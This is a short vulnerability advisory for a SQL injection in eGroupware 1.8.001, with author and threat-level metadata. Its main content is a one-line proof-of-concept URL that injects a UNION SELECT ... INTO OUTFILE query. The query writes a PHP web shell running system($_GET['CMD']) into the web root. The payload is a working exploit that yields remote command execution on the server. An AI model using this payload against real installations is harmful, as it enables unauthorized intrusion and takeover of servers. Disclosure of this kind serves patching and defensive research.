A SQL injection vulnerability in eGroupware version 1.8 can be exploited to extract arbitrary data. In some environments it may be possible to create a PHP shell.
172bfbdcfad1acd11c2432e343fc10b79bc2c32328f1c7d5cf4a1e219b0e5e46
------------------------------------------------------------------------
Software................eGroupware 1.8.001
Vulnerability...........SQL Injection
Threat Level............Critical (4/5)
Download................http://www.egroupware.org/
Discovery Date..........4/7/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A SQL injection vulnerability in can be exploited to extract
arbitrary data. In some environments it may be possible to create a
PHP shell.
--PoC--
http://localhost/egroupware/phpgwapi/js/dhtmlxtree/samples/with_db/loaddetails.php?id=0%20and%201=0%20UNION%20SELECT%20'%3C?php%20system($_GET[%22CMD%22]);%20?%3E','',''%20FROM%20dual%20INTO%20OUTFILE%20'../../htdocs/shell.php';%23